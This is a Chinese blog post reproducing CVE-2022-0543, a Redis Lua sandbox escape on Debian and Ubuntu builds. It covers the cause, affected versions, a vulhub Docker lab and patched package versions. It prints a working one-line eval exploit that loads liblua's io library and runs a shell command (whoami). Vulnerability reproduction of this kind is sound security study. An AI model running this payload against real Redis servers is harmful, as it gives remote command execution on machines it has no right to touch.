CVE-2022-0543:redis lua沙盒绕过命令执行漏洞复现

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量1.2k 收藏 3
点赞数
文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62008601/article/details/127984065
版权

#Redis简介

Redis 全称 Remote Dictionary Server(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库。Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。

#漏洞介绍

redis 是完全开源的,遵守 BSD 协议,是一个高性能的 key-value 数据库。造成redis沙盒逃逸漏洞的原因主要是由于redis lua,redis嵌入了lua编程语言作为其脚本引擎,可通过eval命令使用lua,lua引擎是沙盒化的,不能在运行redis的服务器上执行任意代码。但在Debian以及ubuntu发行版上,由于打包问题,在lua沙箱中遗留了一个对象package,攻击者可以利用这个对象package逃逸redis lua沙盒,在运行redis的服务器上执行任意命令。

#影响版本

  • 2.2 <= redis < 5.0.13

  • 2.2 <= redis < 6.0.15

  • 2.2 <= redis < 6.2.5

#环境搭建

通过vulhub搭建该漏洞环境。

docker-compose up -d //启动环境

docker ps        //查看环境映射端口

 

#漏洞复现

使用redis-cli连接该redis服务器。命令:redis-cli -h your-ip

漏洞poc

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

通过该漏洞poc让redis服务器执行whoami命令

 #漏洞修复

将redis软件包升级更新到以下版本

Debian:

  • Debian Redis(buster):5:5.0.14-1+deb10u2

  • Debian Redis(bullseye):5:6.0.16-1+deb11u2

  • Debian Redis(unstable):5:6.0.16-2

Ubuntu:

  • Ubuntu 21.10 Redis:5:6.0.15-1ubuntu0.1

  • Ubuntu 20.04 Redis:5:5.0.7-2ubuntu0.1

修复方法:在 Lua 初始化的末尾添加package=nil

参考链接:

- <https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>
- <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787>

7562ajj
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-0543(Redis 盒逃逸漏洞
Battery的博客
11-23 8万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行命令,也可以根据需求更换其他命令
CVE-2022-0543(lua绕过命令执行
kriesa的博客
07-13 568
CVE-2022-0543
vulfocus靶场之redis命令执行cve-2022-0543漏洞
没有故事
04-18 775
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸执行任意命令Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。输入网址和端口,点击OK。
春秋云境:CVE-2022-0543(Redis 盒逃逸漏洞
m0_65712192的博客
08-21 1730
Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 938
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
CVE-2022-0543 Redis盒逃逸漏洞
weixin_45715461的博客
07-01 3538
CVE-2022-0543 Redis盒逃逸漏洞
CVE-2022-0543 Redis Lua绕过 命令执行
Foreverlove112的博客
09-22 502
CVE-2022-0543 Redis Lua绕过 命令执行
CVE-2022-0543(redis盒逃逸)
huayimy的博客
02-03 876
CVE-2022-0543(redis盒逃逸借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
CVE-2022-0543 Redis Lua 盒逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4541
CVE-2022-0543 Redis Lua 盒逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是盒化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发系统和应用的漏洞,并进行渗透测试,从而及时修和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
然而,它存在一个名为 CVE-2022-33891 的严重安全漏洞,这是一个命令注入问题,允许攻击者通过精心构造的请求在运行受影响版本的 Spark 实例上执行任意系统命令。 此漏洞源于 Spark Web UI 的一个缺陷,特别是与其 ...
CVE-2022-0543
sinat_25635183的博客
03-25 329
2、CVE-2022-0543即Redis盒逃逸漏洞Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
CVE-2022-0543:Redis Lua 箱逃逸和远程代码执行
weixin_61489125的博客
04-24 353
Reginaldo Silva 发,由于 Debian/Ubuntu 上的打包问题,能够执行任意 Lua 脚本的远程攻击者可能会逃出 Lua 箱并在主机上执行任意代码。该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。Redis 是一种开源(BSD 许可)内存数据结构存储,用作数据库、缓存和消息代理。目前此漏洞已经修,建议受影响用户升级更新到以下修版本,修链接自行官网。变量,该变量又允许访问任意 Lua 功能。前提本地有redis-cli。
CVE-2022-0543 Redis盒逃逸漏洞(CVE-2022-0543)
XZ_______的博客
04-21 991
漏洞
简单漏洞CVE-2022-0543 Redis Lua 绕过
栉风沐雪的博客
01-29 1005
CVE-2022-0543 Redis Lua 绕过漏,在Lua箱中遗留了一个对象package,攻击者可以利用package对象提供的加载动态链接库liblua里的函数逃逸。redis在用户连接后可以通过eval命令执行Lua脚本,但是脚本跑在箱中,正常情况下无法执行命令读取文件,所以这个漏洞的本质是绕过。一般情况下,redis运行在6379(默认端口),而在此镜像中映射于36770端口,可以使用nmap扫描端口发相应服务。影响范围:Debian系得linux发行版本+Ubuntu。
Redis盒逃逸漏洞 RCE(CVE-2022-0543)+getshell
xiaobai_20190815的博客
03-09 971
Redis盒逃逸漏洞 RCE(CVE-2022-0543)+getshell
Redis盒逃逸漏洞(CVE-2022-0543)以及流量特征分析
xhscxj的博客
02-03 1856
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸执行任意命令
redis lua绕过
08-14
根引用和引用,在Debian和Ubuntu的Redis发行版中,由于在Lua箱中遗留了一个对象package,攻击者可以利用该对象的方法加载动态链接库liblua里的函数,从而逃逸执行任意命令。但要利用这个漏洞,攻击者需要具有执行eval命令的权限,即攻击者经过认证或Redis本身未设置鉴权检查。 另外,根据引用,一些发行版本(如Ubuntu、Debian和CentOS)会在原始软件的基础上打补丁,其中有一个针对Redis的补丁。该补丁在lua_libs_debian.c中增加了一个include语句,并使用make生成补丁包。 综上所述,Redis Lua绕过漏洞存在于Debian和Ubuntu的Redis发行版中,攻击者可以利用这个漏洞执行任意命令,前提是攻击者具有执行eval命令的权限,并且Redis未设置鉴权检查。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Redis Lua绕过命令执行CVE-2022-0543)](https://blog.csdn.net/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【CVE-2022-0543】Redis Lua绕过命令执行](https://blog.csdn.net/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [简单漏洞CVE-2022-0543 Redis Lua 绕过](https://blog.csdn.net/qq_74447851/article/details/128791134)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值